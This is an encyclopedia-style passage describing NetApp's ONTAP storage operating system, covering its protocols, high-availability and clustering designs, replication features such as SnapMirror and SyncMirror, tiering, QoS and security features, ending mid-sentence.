ONTAP. Data protocols ONTAP is considered to be a unified storage system, meaning that it supports both block-level (FC, FCoE, NVMeoF and iSCSI) & file-level (NFS, pNFS, CIFS/SMB) protocols for its clients. SDS versions of ONTAP (ONTAP Select & Cloud Volumes ONTAP) do not support FC, FCoE or NVMeoF protocols due to their software-defined nature. NFS NFS was the first protocol available in ONTAP. The latest versions of ONTAP 9 support NFSv2, NFSv3, NFSv4 (4.0 and 4.1) and pNFS. Starting with ONTAP 9.5, 4-byte UTF-8 sequences, for characters outside the Basic Multilingual Plane, are supported in names for files and directories. SMB/CIFS ONTAP supports CIFS 2.0 and higher up to SMB 3.1. Starting with ONTAP 9.4 SMB Multichannel, which provides functionality similar to multipathing in SAN protocols, is supported. Starting with ONTAP 8.2 CIFS protocol supports Continuous Availability (CA) with SMB 3.0 for Microsoft Hyper-V over SMB and SQL Server over SMB. ONTAP supports SMB encryption, which is also known as sealing. Accelerated AES instructions (Intel AES NI) encryption is supported in SMB 3.0 and later. FCP ONTAP on physical appliances supports FCoE as well as FC protocol, depending on HBA port speed. iSCSI iSCSI Data Center Bridging (DCB) protocol supported with A220/FAS2700 systems. NVMeoF NVMe over Fabrics (NVMeoF) refers to the ability to utilize NVMe protocol over existed network infrastructure like Ethernet (Converged or traditional), TCP, Fiber Channel or InfiniBand for transport (as opposite to run NVMe over PCI). NVMe is SAN block level data storage protocol. NVMeoF supported only on All-Flash A-Systems and not supported for low-end A200 and A220 systems. Starting with ONTAP 9.5 ANA protocol supported which provide, similarly to ALUA multi-pathing functionality to NVMe. ANA for NVMe currently supported only with SUSE Enterprise Linux 15. FC-NVMe without ANA supported with SUSE Enterprise Linux 12 SP3 and RedHat Enterprise Linux 7.6. FC-NVMe FC-NVMe Supported on systems with 32Gbps FC ports or higher speeds. The supported Operation Systems with FC-NVMe are: Oracle Linux, VMware, Windows Server, SUSE Linux, RedHat Linux. High Availability High Availability (HA) is clustered configuration of a storage system with two nodes or HA pairs, which aims to ensure an agreed level of operational during expected and unexpected events like reboots, software or firmware updates. HA Pair Even though a single HA pair consists of two nodes (or controllers), NetApp has designed it in such a way that it behaves as a single storage system. HA configurations in ONTAP employ a number of techniques to present the two nodes of the pair as a single system. This allows the storage system to provide its clients with nearly-uninterruptable access to their data should a node either fail unexpectedly or need to be rebooted in an operation known as a "takeover." For example: on the network level, ONTAP will temporarily migrate the IP address of the downed node to the surviving node, and where applicable it will also temporarily switch ownership of FC WWPNs from the downed node to the surviving node. On the data level, the contents of the disks that are assigned to the downed node will automatically be available for use via the surviving node. FAS and AFF storage systems use enterprise level HDD and SSD drives that are housed within disk shelves that have two bus ports, with one port connected to each controller. All of ONTAP's disks have an ownership marker written to them to reflect which controller in the HA pair owns and serves each individual disk. An Aggregate can include only disks owned by a single node, therefore each aggregate owned by a node and any upper objects such as FlexVol volumes, LUNs, File Shares are served with a single controller. Each controller can have its own disks and aggregates and serve them, therefore such HA pair configurations are called Active/Active where both nodes are utilized simultaneously even though they are not serving the same data. Once the downed node of the HA pair has been repaired, or whatever maintenance window that necessitated a takeover has been completed, and the downed node is up and running without issue, a "giveback" command can be issued to bring the HA pair back to "Active/Active" status. HA interconnect High-availability clusters (HA clusters) are the first type of clusterization introduced in ONTAP systems. It aimed to ensure an agreed level of operation. It is often confused with the horizontal scaling ONTAP clusterization that came from the Spinnaker acquisition; therefore, NetApp, in its documentation, refers to an HA configuration as an HA pair rather than as an HA cluster. An HA pair uses some form of network connectivity (often direct connectivity) for communication between the servers in the pair; this is called an HA interconnect (HA-IC). The HA interconnect can use Ethernet or InfiniBand as the communication medium. The HA interconnect is used for non-volatile memory log (NVLOG) replication using RDMA technology and for some other purposes only to ensure an agreed level of operational during events like reboots always between two nodes in a HA pair configuration. ONTAP assigns dedicated, non-sharable HA ports for HA interconnect which could be external or build in chassis (and not visible from the outside). The HA-IC should not be confused with the intercluster or intracluster interconnect that is used for SnapMirror and that can coexist with data protocols on data ports or with Cluster Interconnect ports used for horizontal scaling & online data migration across the multi-node cluster. HA-IC interfaces are visible only on the node shell level. Starting with A320 HA-IC and Cluster interconnect traffic start to use the same ports. MetroCluster MetroCluster (MC) is an additional level of data availability to HA configurations and supported only with FAS and AFF storage systems, later SDS version of MetroCluster was introduced with ONTAP Select & Cloud Volumes ONTAP products. In MC configuration two storage systems (each system can be single node or HA pair) form MetroCluster, often two systems located on two sites with the distance between them up to 300 km therefore called geo-distributed system. Plex is the key underlying technology which synchronizes data between two sites in MetroCluster. In MC configurations NVLOG also replicated between storage systems between sites but uses dedicated ports for that purpose, in addition to HA interconnect. Starting with ONTAP 9.5 SVM-DR supported in MetroCluster configurations. MetroCluster SDS Is a feature of ONTAP Select software, similarly to MetroCluster on FAS/AFF systems MetroCluster SDS (MC SDS) allows to synchronously replicate data between two sites using SyncMirror and automatically switch to survived node transparently to its users and applications. MetroCluster SDS work as ordinary HA pare so data volumes, LUNs and LIFs could be moved online between aggregates and controllers on both sites, which is slightly different than traditional MetroCluster on FAS/AFF systems where data cloud be moved across storage cluster only within site where data originally located. In traditional MetroCluster the only way for applications to access data locally on remote site is to disable one entire site, this process called switchover where in MC SDS ordinary HA process occurs. MetroCluster SDS uses ONTAP Deploy as the mediator (in FAS and AFF world this functionality known as MetroCluster tiebreaker) which came with ONTAP Select as a bundle and generally used for deploying clusters, installing licenses and monitoring them. Horizontal Scaling Clusterization Horizontal scaling ONTAP clusterization came from Spinnaker acquisitions and often referred by NetApp as "Single Namespace", "Horizontal Scaling Cluster" or "ONTAP Storage System Cluster" or just "ONTAP Cluster" and therefore often confused with HA pair or even with MetroCluster functionality. While MetroCluster and HA are Data Protection technologies, single namespace clusterization does not provide data protection. ONTAP Cluster is formed out of one or few HA pairs and adds to ONTAP system Non-Disruptive Operations (NDO) functionality such as non-disruptive online data migration across nodes in the cluster and non-disruptive hardware upgrade. Data migration for NDO operations in ONTAP Cluster require dedicated Ethernet ports for such operations called as cluster interconnect and does not use HA interconnect for this purposes. Cluster interconnect and HA interconnect could not share same ports. Cluster interconnect with a single HA pair could have directly connected cluster interconnect ports while systems with 4 or more nodes require two dedicated Ethernet cluster interconnect switches. ONTAP Cluster could consist only with even number of nodes (they must be configured as HA pairs) except for Single-node cluster. Single-node cluster ONTAP system also called non-HA (stand-alone). ONTAP Cluster managed with a single pain of glass built-in management with Web-based GUI, CLI (SSH and PowerShell) and API. ONTAP Cluster provides Single Name Space for NDO operations through SVM. Single Namespace in ONTAP system is a name for collection of techniques used by Cluster to separate data from front-end network connectivity with data protocols like FC, FCoE, FC-NVMe, iSCSI, NFS and CIFS and therefore provide kind of data virtualization for online data mobility across cluster nodes. On network layer Single Namespace provide a number of techniques for non-disruptive IP address migration, like CIFS Continuous Availability (Transparent Failover), NetApp's Network Failover for NFS and SAN ALUA and path election for online front-end traffic re-balancing with data protocols. NetApp AFF and FAS storage systems can consists of different HA pairs: AFF and FAS, different models and generations and can include up to 24 nodes with NAS protocols or 12 nodes with SAN protocols. SDS systems can't intermix with physical AFF or FAS storage systems. Storage Virtual Machine Also known as Vserver or sometimes SVM. Storage Virtual Machine (SVM) is a layer of abstraction, and alongside with other functions, it virtualizes and separates physical front-end data network from data located on FlexVol volumes. It is used for Non-Disruptive Operations and Multi-Tenancy. It also forms as the highest form of logical construct available with NetApp. A SVM can not be mounted under another SVM, therefore it can be referred to a Global Namespace. SVM divides storage system into slices so few divisions or even organizations can share a storage system without knowing and interfering with each other while using same ports, data aggregates and nodes in the cluster and using separate FlexVol volumes and LUNs. One SVM cannot create, delete, change or even see objects of another SVM so for SVM owners such an environment looks like they are only users on the entire storage system cluster. Non Disruptive Operations There few Non Disruptive Operations (NDO) operations with (Clustered) ONTAP system. NDO data operations include: aggregate relocation within an HA pair between nodes, FlexVol volume online migration (known as Volume Move operation) across aggregates and nodes within Cluster, LUNs migration (known as LUN Move operation) between FlexVol volumes within Cluster. LUN move and Volume Move operations use Cluster Interconnect ports for data transfer (HA-CI is not in use for such operations). SVM behave differently with network NDO operations, depending on front-end data protocol. To decrease latency to its original level FlexVol volumes and LUNs have to be located on the same node with network address through which the clients access storage system, so network address could be created for SAN or moved for NAS protocols. NDO operations are free functionality. NAS LIF For NAS front-end data protocols there are NFSv2, NFSv3, NFSv4 and CIFSv1, SMBv2 and SMB v3 which do not provide network redundancy with the protocol itself, so they rely on storage and switch functionalities for this matter. For this reason ONTAP support Ethernet Port Channel and LACP with its Ethernet network ports on L2 layer (known in ONTAP as interface group, ifgrp), within a single node and also non-disruptive Network Fail Over between nodes in cluster on L3 layer with migrating Logical Interfaces (LIF) and associated IP addresses (similar to VRRP) to survived node and back home when failed node restored. SAN LIF For front-end data SAN protocols. ALUA feature used for network load balancing and redundancy in SAN protocols so all the ports on node where data located are reported to clients as active preferred path with load balancing between them while all other network ports on all other nodes in the cluster are active non-preferred path so in case of one port or entire node goes down, client will have access to its data using non-preferred path. Starting with ONTAP 8.3 Selective LUN Mapping (SLM) was introduced to reduce the number of paths to the LUN and removes non-optimized paths to the LUN through all other cluster nodes except for HA partner of the node owning the LUN so cluster will report to the host paths only from the HA pare where LUN is located. Because ONTAP provides ALUA functionality for SAN protocols, SAN network LIFs do not migrate like with NAS protocols. When data or network interfaces migration is finished it is transparent to storage system's clients due to ONTAP Architecture and can cause temporary or permanent data indirect access through ONTAP Cluster interconnect (HA-CI is not in use for such situations) which will slightly increase latency for the clients. SAN LIFs used for FC, FCoE, iSCSi & FC-NVMe protocols. VIP LIF VIP (Virtual IP) LIFs require Top-of-the-Rack BGP Router used. BGP data LIFs alongside with NAS LIFs also can be used with Ethernet for NAS environment but in case of BGP LIFs, automatically load-balance traffic based on routing metrics and avoid inactive, unused links. BGP LIFs provide distribution across all the NAS LIFs in a cluster, not limited to a single node as in NAS LIFs. BGP LIFs provide smarter load balancing than it was realized with hash algorithms in Ethernet Port Channel & LACP with interface groups. VIP LIF interfaces are tested and can be used with MCC and SVM-DR. Management interfaces Node management LIF interface can migrate with associated IP address across Ethernet ports of a single node and available only while ONTAP running on the node, usually located on e0M port of the node; Node management IP sometimes used by cluster admin to communicate with a node to cluster shell in rare cases where commands have to be issued from a particular node. Cluster Management LIF interface with associated IP address available only while the entire cluster is up & running and by default can migrate across Ethernet ports, often located on one of the e0M ports on one of the cluster nodes and used for cluster administrator for management purposes; it used for API communications & HTML GUI & SSH console management, by default ssh connect administrator with cluster shell. Service Processor (SP) interfaces available only at hardware appliances like FAS & AFF and allows ssh out-of-band console communications with an embedded small computer installed on controller mainboard and similarly to IPMI allows to connect, monitor & manage controller even if ONTAP OS is not booted, with SP it is possible to forcibly reboot or halt a controller and monitor coolers & temperature, etc.; connection to SP by ssh brings administrator to SP console but when connected to SP it is possible to switch to cluster shell through it; each controller has one SP which does not migrate like some other management interfaces. Usually, e0M and SP both lives on a single management (wrench) physical Ethernet port but each has its own dedicated MAC address. Node LIFs, Cluster LIF & SP often using the same IP subnet. SVM management LIF, similarly to cluster management LIF can migrate across all the Ethernet ports on the nodes of the cluster but dedicated for a single SVM management; SVM LIF does not have GUI capability and can facilitate only for API Communications & SSH console management; SVM management LIF can live on e0M port but often located on a data port of a cluster node on a dedicated management VLAN and can be different from IP subnets that node & cluster LIFs. Cluster interfaces The cluster interconnect LIF interfaces using dedicated Ethernet ports and cannot share ports with management and data interfaces and for horizontal scaling functionality at times when like a LUN or a Volume migrates from one node of the cluster to another; cluster interconnect LIF similarly to node management LIFs can migrate between ports of a single node. Intercluster interface LIFs can live and share the same Ethernet ports with data LIFs and used for SnapMirror replication; intercluster interface LIFs, similarly to node management & LIFs cluster interconnect can migrate between ports of a single node. Multi Tenancy ONTAP provide two techniques for Multi Tenancy functionality like Storage Virtual Machines and IP Spaces. On one hand SVMs are similar to Virtual Machines like KVM, they provide visualization abstraction from physical storage but on another hand quite different because unlike ordinary virtual machines SVMs does not allow to run third party binary code like in Pure storage systems; they just provide virtualized environment and storage resources instead. Also SVMs unlike ordinary virtual machines do not run on a single node but for the end user it looks like an SVM runs as a single entity on each node of the whole cluster. SVM divides storage system into slices, so a few divisions or even organizations can share a storage system without knowing and interfering with each other while utilizing same ports, data aggregates and nodes in the cluster and using separate FlexVol volumes and LUNs. Each SVM can run its own frontend data protocols, set of users, use its own network addresses and management IP. With use of IP Spaces users can have the same IP addresses and networks on the same storage system without interfering. Each ONTAP system must run at least one Data SVM in order to function but may run more. There are a few levels of ONTAP management and Cluster Admin level has all of the available privileges. Each Data SVM provides to its owner vsadmin which has nearly full functionality of Cluster Admin level but lacks physical level management capabilities like RAID group configuration, Aggregate configuration, physical network port configuration. However, vsadmin can manage logical objects inside an SVM like create, delete and configure LUNs, FlexVol volumes and network addresses, so two SVMs in a cluster can't interfere with each other. One SVM cannot create, delete, modify or even see objects of another SVM, so for SVM owners such an environment looks like they are the only users in the entire storage system cluster. Multi Tenancy is free functionality in ONTAP. FlexClone FlexClone is a licensed feature, used for creating writable copies of volumes, files or LUNs. In case of volumes, FlexClone acts as a snapshot but allows to write into it, while an ordinary snapshot allows only to read data from it. Because WAFL architecture FlexClone technology copies only metadata inodes and provides nearly instantaneous data copying of a file, LUN or volume regardless of its size. SnapRestore SnapRestore is a licensed feature, used for reverting active file system of a FlexVol to a previously created snapshot for that FlexVol with restoring metadata inodes in to active file system. SnapRestore is used also for a single file restore or LUN restore from a previously created snapshot for the FlexVol where that object located. Without SnapRestore license in NAS environment it is possible to see snapshots in network file share and be able to copy directories and files for restore purposes. In SAN environment there is no way of doing restore operations similar to NAS environment. It is possible to copy in both SAN and NAS environments files, directories, LUNs and entire FlexVol content with ONTAP command which is free. Process of copying data depend on the size of the object and could be time consuming, while SnapRestore mechanism with restoring metadata inodes in to active file system almost instant regardless of the size of the object been restored to its previous state. FlexGroup FlexGroup is a free feature introduced in version 9, which utilizes the clustered architecture of the ONTAP operating system. FlexGroup provides cluster-wide scalable NAS access with NFS and CIFS protocols. A FlexGroup Volume is a collection of constituent FlexVol volumes distributed across nodes in the cluster called just "Constituents", which are transparently aggregated in a single space. Therefore, FlexGroup Volume aggregates performance and capacity from all the Constituents and thus from all nodes of the cluster where they located. For the end user, each FlexGroup Volume is represented by a single, ordinary file-share. The full potential of FlexGroup will be revealed with technologies like pNFS (currently not supported with FlexGroup), NFS Multipathing (session trunking, also not available in ONTAP) SMB multichannel (currently not supported with FlexGroup), SMB Continuous Availability (FlexGroup with SMB CA Supported with ONTAP 9.6), and VIP (BGP). The FlexGroup feature in ONTAP 9 allows to massively scale in a single namespace to over 20PB with over 400 billion files, while evenly spreading the performance across the cluster. Starting with ONTAP 9.5 FabricPool supported with: FlexGroup, it is recommended to have all the constituent volumes to backup to a single S3 bucket; supports SMB features for native file auditing, FPolicy, Storage Level Access Guard (SLA), copy offload (ODX) and inherited watches of changes notifications; Quotas and Qtree. SMB Contiguous Availability (CA) supported on FlexGroup allows running MS SQL & Hyper-V on FlexGroup, and FlexGroup supported on MetroCluster. SnapMirror Snapshots form the basis for NetApp's asynchronous disk-to-disk replication (D2D) technology, SnapMirror, which effectively replicates Flexible Volume snapshots between any two ONTAP systems. SnapMirror is also supported from ONTAP to Cloud Backup and from SolidFire to ONTAP systems as part of NetApp's Data Fabric vision. NetApp also offers a D2D backup and archive feature named SnapVault, which is based on replicating and storing snapshots. Open Systems SnapVault allows Windows and UNIX hosts to back up data to an ONTAP, and store any filesystem changes in snapshots (not supported in ONTAP 8.3 and onwards). SnapMirror is designed to be part of a Disaster recovery plan: it stores an exact copy of data on time when snapshot was created on the disaster recovery site and could keep the same snapshots on both systems. SnapVault, on the other hand, is designed to store less snapshots on the source storage system and more Snapshots on a secondary site for a long period of time. Data captured in SnapVault snapshots on destination system could not be modified nor accessible on destination for read-write, data can be restored back to primary storage system or SnapVault snapshot could be deleted. Data captured in snapshots on both sites with both SnapMirror and SnapVault can be cloned and modified with the FlexClone feature for data cataloging, backup consistency and validation, test and development purposes etc. Later versions of ONTAP introduced cascading replication, where one volume could replicate to another, and then another, and so on. Configuration called fan-out is a deployment where one volume replicated to multiple storage systems. Both fan-out and cascade replication deployments support any combination of SnapMirror DR, SnapVault, or unified replication. It is possible to use fan-in deployment to create data protection relationships between multiple primary systems and a single secondary system: each relationship must use a different volume on the secondary system. Starting with ONTAP 9.4 destination SnapMirror & SnapVault systems enable automatic inline & offline deduplication by default. Intercluster is a relationship between two clusters for SnapMirror, while Intracluster is opposite to it and used for SnapMirror relationship between storage virtual machines (SVM) in a single cluster. SnapMirror can operate in version-dependent mode, where two storage systems must run on the same version of ONTAP or in version-flexible mode. Types of SnapMirror replication: Data Protection (DP): Also known as SnapMirror DR. Version-dependent replication type originally developed by NetApp for Volume SnapMirror, destination system must be same or higher version of ONTAP. Not used by default in ONTAP 9.3 and higher. Volume-level replication, block-based, metadata independent, uses Block-Level Engine (BLE). Extended Data Protection (XDP): Used by SnapMirror Unified replication and SnapVault. XDP uses the Logical Replication Engine (LRE) or if volume efficiency different on the destination volume the Logical Replication Engine with Storage Efficiency (LRSE). Used as Volume-level replication but technologically could be used for directory-based replication, inode-based, metadata dependent (therefore not recommended for NAS with millions of files). Load Sharing (LS): Mostly used for internal purposes like keeping copies of root volume for an SVM. SnapMirror to Tape (SMTape): is Snapshot copy-based incremental or differential backup from volumes to tapes; SMTape feature performing a block-level tape backup using NDMP-compliant backup applications such as CommVault Simpana. SnapMirror-based technologies: Unified replication: A volume with Unified replication can get both SnapMirror and SnapVault snapshots. Unified replication is combination of SnapMirror Unified replication and SnapVault which using a single replication connection. Both SnapMirror Unified replication and SnapVault are using same XDP replication type. SnapMirror Unified Replication is also known as Version-flexible SnapMirror. Version-flexible SnapMirror/SnapMirror Unified Replication introduced in ONTAP 8.3 and removes the restriction to have the destination storage use the same, or higher, version of ONTAP. SVM-DR (SnapMirror SVM): replicates all volumes (exceptions allowed) in a selected SVM and some of the SVM settings, replicated settings depend on protocol used (SAN or NAS) Volume Move: Also known as DataMotion for Volumes. SnapMirror replicates volume from one aggregate to another within a cluster, then I/O operations stops for acceptable timeout for end clients, final replica transferred to destination, source deleted and destination becomes read-write accessible to its clients SnapMirror is a licensed feature, a SnapVault license is not required if a SnapMirror license is already installed. SVM-DR SVM DR based on SnapMirror technology which transferring all the volumes (exceptions allowed) and data in them from a protected SVM to a DR site. There are two modes for SVM DR: identity preserve and identity discard. With Identity discard mode, on the one hand, data in volumes copied to the secondary system and DR SVM does not preserve information like SVM configuration, IP addresses, CIFS AD integration from original SVM. On another hand in identity discard mode, data on the secondary system can be brought online in read-write mode while primary system online too, which might be helpful for DR testing, Test/Dev and other purposes. Therefore, identity discard requires additional configuration on the secondary site in the case of disaster occurs on the primary site. In the identity preserve mode, SVM-DR copying volumes and data in them and also information like SVM configuration, IP addresses, CIFS AD integration which requires less configuration on DR site in case of disaster event on primary site but in this mode, the primary system must be offline to ensure there will be no conflict. SnapMirror Synchronous SnapMirror Sync (SM-S) for short is zero RPO data replication technology previously available in 7-mode systems and was not available in (clustered) ONTAP until version 9.5. SnapMirror Sync replicates data on Volume level and has requirements for RTT less than 10ms which gives distance approximately of 150 km. SnapMirror Sync can work in two modes: Full Synchronous mode (set by default) which guarantees zero application data loss between two sites by disallowing writes if the SnapMirror Sync replication fails for any reason. Relaxed Synchronous mode allows an application to write to continue on primary site if the SnapMirror Sync fails and once the relationship resumed, automatic re-sync will occur. SM-S supports FC, iSCSI, NFSv3, NFSv4, SMB v2 & SMB v3 protocols and have the limit of 100 volumes for AFF, 40 volumes for FAS, 20 for ONTAP Select and work on any controllers which have 16GB memory or more. SM-S is useful for replicating transactional logs from: Oracle DB, MS SQL, MS Exchange etc. Source and destination FlexVolumes can be in a FabricPool aggregate but must use backup policy, FlexGroup volumes and quotas are not currently supported with SM-S. SM-S is not free feature, the license is included in the premium bundle. Unlike SyncMirror, SM-S not uses RAID & Plex technologies, therefore, can be configured between two different NetApp ONTAP storage systems with different disk type & media. FlexCache Volumes FlexCache technology previously available in 7-mode systems and was not available in (clustered) ONTAP until version 9.5. FlexCache allows serving NAS data across multiple global sites with file locking mechanisms. FlexCache volumes can cache reads, writes, and metadata. Writes on the edge generating push operation of the modified data to all the edge ONTAP systems requested data from the origin, while in 7-mode all the writes go to the origin and it was an edge ONTAP system's job to check the file haven't been updated. Also in FlexCache volumes can be less size that original volume, which is also an improvement compare to 7-mode. Initially, only NFS v3 supported with ONTAP 9.5. FlexCache volumes are sparsely-populated within an ONTAP cluster (intracluster) or across multiple ONTAP clusters (inter-cluster). FlexCache communicates over Intercluster Interface LIFs with other nodes. Licenses for FlexCache based on total cluster cache capacity and not included in the premium bundle. FAS, AFF & ONTAP Select can be combined to use FlexCache technology. Allowed to create 10 FlexCache volumes per origin FlexVol volume, and up to 10 FlexCache volumes per ONTAP node. The original volume must be stored in a FlexVol while all the FlexCache Volumes will have FlexGroup volume format. SyncMirror Data ONTAP also implements an option named RAID SyncMirror (RSM), using the plex technique, where all the RAID groups within an aggregate or traditional volume can be synchronously duplicated to another set of hard disks. This is typically done at another site via a Fibre Channel or IP link, or within a single controller with local SyncMirror for a single disk-shelf resiliency. NetApp's MetroCluster configuration uses SyncMirror to provide a geo-cluster or an active/active cluster between two sites up to 300 km apart or 700 km with ONTAP 9.5 and MCC-IP. SyncMirror can be used either in software-defined storage platforms, on Cloud Volumes ONTAP, or on ONTAP Select. It provides high availability in environments with directly attached (non-shared) disks on top of commodity servers, or at FAS and AFF platforms in Local SyncMirror or MetroCluster configurations. SyncMirror is a free feature. SnapLock SnapLock implements Write Once Read Many (WORM) functionality on magnetic and SSD disks instead of to optical media so that data cannot be deleted until its retention period has been reached. SnapLock exists in two modes: compliance and enterprise. Compliance mode was designed to assist organizations in implementing a comprehensive archival solution that meets strict regulatory retention requirements, such as regulations dictated by the SEC 17a-4(f) rule, FINRA, HIPAA, CFTC Rule 1.31(b), DACH, Sarbanes-Oxley, GDPR, Check 21, EU Data Protection Directive 95/46/EC, NF Z 42-013/NF Z 42-020, Basel III, MiFID, Patriot Act, Graham-Leach-Bliley Act etc. Records and files committed to WORM storage on a SnapLock Compliance volume cannot be altered or deleted before the expiration of their retention period. Moreover, a SnapLock Compliance volume cannot be destroyed until all data has reached the end of its retention period. SnapLock is a licensed feature. SnapLock Enterprise is geared toward assisting organizations that are more self-regulated and want more flexibility in protecting digital assets with WORM-type data storage. Data stored as WORM on a SnapLock Enterprise volume is protected from alteration or modification. There is one main difference from SnapLock Compliance: as the files being stored are not for strict regulatory compliance, a SnapLock Enterprise volume can be destroyed by an administrator with root privileges on the ONTAP system containing the SnapLock Enterprise volume, even if the designed retention period has not yet passed. In both modes, the retention period can be extended, but not shortened, as this is incongruous with the concept of immutability. Also, NetApp's SnapLock data volumes are equipped with a tamper-proof compliance clock, which is used as a time reference to block forbidden operations on files, even if the system time tampered. Starting with ONTAP 9.5 SnapLock supports Unified SnapMirror (XDP) engine, re-synchronization after fail-over without data loss, 1023 snapshots, efficiency mechanisms and clock synchronization in SDS ONTAP. FabricPool Available for SSD-only aggregates in FAS/AFF systems or Cloud Volumes ONTAP on SSD media. Starting with ONTAP 9.4 FabricPool supported on ONTAP Select platform. Cloud Volumes ONTAP also supports HDD + S3 FabricPool configuration. Fabric Pool provides automatic storage tiering capability for cold data blocks from fast media (usually SSD) on ONTAP storage to cold media via object protocol to object storage such as S3 and back. Fabric Pool can be configured in two modes: One mode is used to migrate cold data blocks captured in snapshots, while the other mode is used to migrate cold data blocks in an active file system. FabricPool preserves offline deduplication & offline compression savings. Starting with ONTAP 9.4 introduced FabricPool 2.0 with the ability to tier-off active file system data (by default 31-day data not been accessed) & support data compaction savings. The recommended ratio is 1:10 for inodes to data files. For clients connected to the ONTAP storage system, all the Fabric Pool data-tiering operations are completely transparent, and in case data blocks become hot again, they are copied back to fast media in the ONTAP storage system. Fabric Pool is currently compatible with the NetApp StorageGRID, Amazon S3, Google Cloud, and Alibaba object storage services. Starting with ONTAP 9.4 Azure Blob supported, starting with 9.5 IBM Cloud Object Storage (ICOS) and Amazon Commercial Cloud Services (C2S) supported, other object-based SW & services could be used if requested by the user and that service will be validated by NetApp. FlexGroup volumes supported with FabricPool starting with ONTAP 9.5. The Fabric Pool feature in FAS/AFF systems is free for use with NetApp StorageGRID external object storage. For other object storage systems such as Amazon S3 & Azure Blob, Fabric Pool must be licensed per TB to function (alongside costs for Fabric Pool licensing, the customer needs to also pay for consumed object space). While with the Cloud Volumes ONTAP storage system, Fabric Pool does not require licensing, costs will apply only for consumed space on the object storage. Starting with ONTAP 9.5 capacity utilization triggering tiering from hot tier can be adjusted. SVM-DR also supported by FlexGroups. FabricPool, first available in ONTAP 9.2, is a NetApp Data Fabric technology that enables automated tiering of data to low-cost object storage tiers either on or off-premises. Unlike manual tiering solutions, FabricPool reduces the total cost of ownership by automating the tiering of data to lower the cost of storage. It delivers the benefits of cloud economics by tiering to public clouds such as Alibaba Cloud Object Storage Service, Amazon S3, Google Cloud Storage, IBM Cloud Object Storage, and Microsoft Azure Blob Storage as well as to private clouds such as NetApp StorageGRID®. FabricPool is transparent to applications and allows enterprises to take advantage of cloud economics without sacrificing performance or having to re-architect solutions to leverage storage efficiency. FlashCache NetApp storage systems running ONTAP can Flash Cache (formally Performance Accelerate Module or PAM) custom purpose-built proprietary PCIe card for hybrid NetApp FAS systems. Flash Cache can reduce read latencies and allows the storage systems to process more read-intensive work without adding any further spinning disk to the underlying RAID since read operations do not require redundancy in case of Flash Cache failure. Flash Cache works on controller level and accelerates only read operations. Each separate volume on the controller can have a different caching policy or read cache could be disabled for a volume. FlashCache caching policies applied on FlexVol level. FlashCache technology is compatible with the FlexArray feature. Starting with 9.1, a single FlexVol volume can benefit from both FlashPool & FlashCache caches simultaneously. Beginning with ONTAP 9.5 Flash Cache read-cache technology available in Cloud Volumes ONTAP with the use of ephemeral SSD drives. NDAS NDAS proxy is a service introduced in ONTAP 9.5; it works in conjunction with NDAS service in a cloud provider. Similarly to FabricPool, NDAS stores data in object format, but unlike FabricPool, it stores WAFL metadata in object storage as well. The information which been transferred from the ONTAP system is snapshot deltas, not the entire set of data, and already deduplicated & compressed (on volume level). NDAS proxy is HTTP-based with an S3 object protocol and few additional API calls to the cloud. NDAS in ONTAP 9.5 works only in a schema with primary ONTAP 9 storage replicating data via Snapmirror to secondary ONTAP 9.5 storage, where secondary storage is also NDAS proxy. QoS Storage QoS is a free feature in ONTAP systems. There are few types of storage QoS in ONTAP systems: Adaptive QoS (A-QoS), which includes Absolute minimum QoS; Ordinary static QoS or Minimum QoS (QoS min); and Maximum QoS (QoS max). Maximum QoS can be configured as a static upper limit in IOPS, MB/s, or both. It can be applied to an object such as Volume, LUN or a file, to prevent from such an object from consuming more storage performance resources than defined by the administrator (thus isolating performance-intensive bullies and protecting other workloads). Minimum QoS is contrary to maximum set on volumes to ensure that the volume will get no less than configured by the administrator static number of IOPS when there is contention for storage performance resources and could be applied to volumes. A-QoS is a mechanism of automatically changing QoS, based on consumed space by a flexible volume, because consumed space in it could grow or decrease, and the size of FlexVol can be changed. On FAS systems, A-QoS reconfigures only Peak performance (QoS max), while on AFF systems, it reconfigure both Expected performance (QoS min) and Peak performance (QoS max) on a volume. A-QoS allows ONTAP to automatically adjust the number of IOPS for a volume based on A-QoS policies. There are three basic A-QoS policies: Extreme, Performance and Value. Each A-QoS policy has a predefined fixed ratio IO per TB for Peak performance and Expected performance (or Absolute minimum QoS). Absolute minimum QoS is used instead of Expected performance (QoS min) only when volume size and ratio IO per TB is too small for example 10GB. Security ONTAP OS has a number of features to increase security on the storage system like Onboard Key Manager, the passphrase for controller boot with NSE & NVE encryption and USB key manager (available starting with 9.4). Auditing for NAS events is another security measure in ONTAP that enables the customer to track and log certain CIFS and NFS events on the storage system. This helps to track potential security problems and provides evidence of any security breaches. ONTAP accessed over SSH has an ability to Authenticate with a Common Access Card. ONTAP supports RBAC: Role-based access control allows administrative accounts to be restricted and/or limited in what actions they can take on the system. RBAC prevents a single account from being allowed to perform all potential actions available on the system. Beginning with ONTAP 9, Kerberos 5 authentication with privacy service (krb5p) is supported for NAS. The krbp5 authentication mode protects against data tampering and snooping by using checksums to encrypt all traffic between client and server. The ONTAP solution supports 128-bit and 256-bit AES encryption for Kerberos. Key Manager Onboard Key Manager is a free feature introduced in 9.1 and can store keys from NVE encrypted volumes & NSE disks. NSE Disks are available only on AFF/FAS platforms. ONTAP systems also allow storing encryption keys on a USB drive connected to the appliance. ONTAP also can use an external key manager like Gemalto Trusted Key Manager. NetApp Volume Encryption NetApp Volume Encryption (NVE) is FlexVol volume-level software-based encryption, which uses storage CPU for data encryption purposes; thus, some performance degradation is expected though it is less noticeable on high-end storage systems with more CPU cores. NVE is licensed, but free features compatible nearly with all NetApp ONTAP features and protocols. Similarly to NetApp Storage Encryption (NSE), NVE can store encryption keys locally or on a dedicated key manager like IBM Security Key Lifecycle Manager, SafeNet KeySecure or cloud key managers. NVE, like NSE, is also data at rest encryption, which means it protects only from physical disks theft and does not give an additional level of data security protection in a healthy operational and running system. NVE with a combination of FabricPool technology also protects data from unauthorized access in external S3 storage systems like Amazon and since data already encrypted it transferring over the wire in encrypted form. GDPR Starting with ONTAP 9.4 new feature introduced called Secure Purge which provides ability to securely delete a file to comply with GDPR requirements. VSCAN and FPolicy ONTAP Vscan and FPolicy are aimed at malware prevention in ONTAP systems with NAS. Vscan provides a way for NetApp antivirus scanner partners to verify that files are virus-free. FPolicy integrates with NetApp partners to monitor file access behaviors. FPolicy file-access notification system monitor activity on NAS storage and prevent unwanted access or change to files based on policy settings. Both help in preventing ransomware from getting a foothold in the first place. Additional Functionality MTU black-hole detection and path MTU discovery (PMTUD) is the processes by which the ONTAP system connected via an Ethernet network detects maximum MTU size. In ONTAP 9.2: Online Certificate 